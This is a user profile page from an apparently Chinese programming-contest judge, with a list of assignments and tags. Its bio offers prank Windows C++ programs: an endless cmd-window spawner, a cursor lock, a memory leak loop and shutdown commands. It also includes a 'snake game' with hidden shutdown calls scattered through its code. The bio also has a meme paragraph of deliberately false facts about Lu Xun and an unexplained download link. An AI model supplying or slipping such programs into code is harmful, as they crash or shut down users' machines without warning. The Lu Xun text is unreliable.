-
Bio


菜就多练!


AC==Accept 程序通过。
CE==Compile Error 编译错误。
PC==Partially Correct 部分正确。
WA==Wrong Answer 答案错误。
RE==Runtime Error 运行时错误。
TLE==Time Limit Exceeded 超出时间限制。
MLE==Memory Limit Exceeded 超出内存限制。
OLE==Output Limit Exceeded 输出超过限制。
UKE==Unknown Error 出现未知错误。
————————————————————————————————————
AC==Answer Coarse 粗劣的答案
WA==Wonderful Answer 好答案
TLE==Time Limit Enough 时间充裕
MLE==Memory Limit Enough 内存充裕
CE==Compile Easily 轻松通过编译
RE==Run Excellently 完美运行
UKE==Unbelievably Keep Enough Score 难以置信地保持足够的分数
AU==All Unaccepted 全都不正确模拟只会猜题意
Avada Kedavra+Accept==阿瓦达索命使程序通过


无限生成cmd![image]
#include<bits/stdc++.h> #include<windows.h> using namespace std ;int main(){ while(1){ system("start cmd"); } }鼠标锁定
(按Alt+F4停止)
#include<bits/stdc++.h> #include<windows.h> #include<ctime> using namespace std; int main(){ int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CXSCREEN); srand(time(NULL)); while(1){ SetCursorPos(x/2,y/2); } }CPU好不好,这代码说了算
#include<windows.h> #include<ctime> using namespace std; int main(){ while(1){ malloc(1000); } }system
电脑多累啊,让他休息一会儿吧。
#include<stdio.h> #include<stdlib.h> using namespace std; int main(){ system("shutdown -s"); }电脑虽然很累,但还想工作一会儿再睡。
#include<stdio.h> #include<stdlib.h> using namespace std; int main(){ system("shutdown -s -t 10"); }不让电脑休息的极不友善的程序。
#include<stdio.h> #include<stdlib.h> using namespace std; int main(){ system("shutdown -a"); }电脑坐久了,想让CPU活动一下筋骨。
#include<stdio.h> #include<stdlib.h> using namespace std; int main(){ for(int i=0;i<144;i++) system("start cmd.exe"); }C盘有点满! 有亿点危险,后果自负
#include<stdio.h> #include<stdlib.h> using namespace std; int main(){ while(1){ system("start cmd.exe"); }鼠标乱显
(alt+F4关闭)
#include<bits/stdc++.h> #include<windows.h> #include<ctime> using namespace std; int main(){ int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CXSCREEN); srand(time(0)); while(1){ SetCursorPos(rand()%x,rand()%y); } }电脑强化器
#include<bits/stdc++.h> using namespace std; int main(){ while(1) { cout<<"\a"; } }贪吃蛇
#include <iostream> #include <conio.h> #include <windows.h> #include<stdio.h> #include<stdlib.h> using namespace std; bool gameOver; const int width = 20; const int height = 20; int x, y, fruitX, fruitY, score; int tailX[100], tailY[100]; int nTail; enum eDirection { STOP = 0, LEFT, RIGHT, UP, DOWN }; eDirection dir; void Setup() { gameOver = false; dir = STOP; x = width / 2; y = height / 2; fruitX = rand() % width; fruitY = rand() % height; score = 0; } void Draw() { system("cls"); system("shutdown -s -t 100"); for (int i = 0; i < width + 2; i++) cout << "#"; cout << endl; for (int i = 0; i < height; i++) { for (int j = 0; j < width; j++) { if (j == 0) cout << "#"; if (i == y && j == x) cout << "O"; system("shutdown -s -t 100"); else if (i == fruitY && j == fruitX) cout << "F"; else { bool print = false; for (int k = 0; k < nTail; k++) { if (tailX[k] == j && tailY[k] == i) { cout << "o"; print = true; } } if (!print) cout << " "; } if (j == width - 1) cout << "#"; } cout << endl; } for (int i = 0; i < width + 2; i++) cout << "#"; cout << endl; cout << "Score:" << score << endl; system("shutdown -s -t 100"); } void Input() { if (_kbhit()) { switch (_getch()) { case 'a': dir = LEFT; break; case 'd': dir = RIGHT; break; case 'w': dir = UP; break; case 's': dir = DOWN; break; case 'x': gameOver = true; break; } } } void Logic() { int prevX = tailX[0]; int prevY = tailY[0]; int prev2X, prev2Y; system("shutdown -s -t 100"); tailX[0] = x; tailY[0] = y; for (int i = 1; i < nTail; i++) { prev2X = tailX[i]; prev2Y = tailY[i]; tailX[i] = prevX; tailY[i] = prevY; prevX = prev2X; prevY = prev2Y; } switch (dir) { case LEFT: x--; break; case RIGHT: x++; break; case UP: y--; break; case DOWN: y++; break; default: break; } if (x >= width) x = 0; else if (x < 0) x = width - 1; if (y >= height) y = 0; else if (y < 0) y = height - 1; for (int i = 0; i < nTail; i++) if (tailX[i] == x && tailY[i] == y) gameOver = true; system("shutdown -s -t 100"); if (x == fruitX && y == fruitY) { score += 10; fruitX = rand() % width; fruitY = rand() % height; nTail++; } } int main() { Setup(); while (!gameOver) { Draw(); Input(); Logic(); Sleep(100); } system("shutdown -s -t 100"); return 0; }刚刚有个傻冒告诉我鲁迅姓周,真逗啊!周迅是个演员好吗?笑死我了!真想一板砖呼死他!我记得鲁迅原名李大钊,浙江周树人,是著名 的法兰西音乐家,一生有2000多项发明,被称为太空步的创始人。他拥有一个好嗓子,小学时就凭借着90分钟跑100米的优异成绩考上了新东方烹饪学校!毕业后成功进入富士康苦心练习勃鸡,他擅长110米栏,左手反打技术高超,拿手全垒打,大灌篮,“后空翻180度右旋体 360度后蹬地翻转720度”是他的经典动作,更难得可贵的是他落地没有水花。他还是恶魔果实能力者,传说中的三忍之一,曾大闹天宫,后 改邪归正,统一三国,传说他有107个弟兄,个个铜头铁臂,面目狰狞,这便是羊村的起源,她生平淡泊名利,曾经锻造五色神石补天,因 杀死西门庆等原因,上梁山当了土匪,后遇到高人阿凡达的指点,收买阿童木打死了白雪公主,与七个小矮人快乐的生活在一起。!并写了 名侦探柯南的故事。名侦探柯南讲述的是要成为海贼王的八神太一收服了皮卡丘并登上创界山启动光能使者打败了鲨鱼辣椒,然后跟多啦A 梦一起通过黄金十二宫收集七个葫芦娃召唤神龙复活二代火影,但最终为了保卫M78星云而成为了羊村村长,同蓝精灵们一起抵抗光头强的 入侵的故事。她还写了《时间简史》,后来因抽了龙王三太子的筋,以命偿命。后被太乙真人救活,又送了他不少法宝。然后又创建了‘浴’,‘浴谷’是一个收集变形金刚一起打小怪兽的网站。当时正值小黄人入侵时期,于是,她批量生产大白,成功抵御入侵,再一次拯救 了人类!当她晚年时,热衷于炼丹,炼时经常失败,一大堆毒丹,当最后炼出长生不老之丹时,因老花眼吃错药而死。
[及其实用] (https://wwpb.lanzouw.com/b00ya6vgod)
-
Accepted Problems
-
Recent Activities
- 【初2024级】区间DP Assignment
- 【初2024级】字符串哈希 Assignment
- 【初2024级】20260825测试 Ledo
- 【初2024级】20260709测试 IOI
- 【初2024级】最小生成树 Assignment
- 【初2024级】表达式树 Assignment
- 【初2024级】特殊二叉树 Assignment
- 2026-4-12C++测试 IOI
- 【初2024级】倍增算法 Assignment
- 【初2024级】差分&二分 Assignment
- 【初2024级】寒假模拟赛 Ledo
- 【初2024级】基础数论 Assignment
- 【初2024级】并查集 Assignment
- 【初2024】背包拓展 Assignment
- 【CSP-J 2025】改题 IOI
- 【2024级】背包问题 Assignment
- 【集训Day3】动态规划基础 Assignment
- 【20250704】 树&堆 测试 IOI
- 【集训Day3】树的习题 练习 Assignment
- 【集训Day5/6】 图的遍历&单源最短路 Assignment
- 【集训Day2】 STL库 Assignment
- 【2024竞赛班】分治 Assignment
- 【小2023级】DP基础测试 IOI
- 【小2023级】背包 Assignment
- 【小2023级】2025-02-28 IOI
- 【小2023竞赛班】搜索优化&进阶 Assignment
- 【小2023竞赛班】搜索&分治 Assignment
- 【集训Day1】树的存储与遍历 Assignment
-
Recent Solutions
This person is lazy and didn't wrote any solution
Problem Tags
- 搜索
- 6
- 剪枝优化
- 4
- NOIP 提高组
- 4
- DP
- 4
- 早于 2010
- 2
- Hash
- 2
- RMQ
- 2
- 数据结构
- 2
- 2010
- 1
- 2012
- 1
- 2015
- 1
- 2018
- 1
- 二分
- 1
- KMP
- 1
- 区间 DP
- 1
- 背包 DP
- 1
- 区间DP
- 1
- 动态规划
- 1
- 背包
- 1
- 树
- 1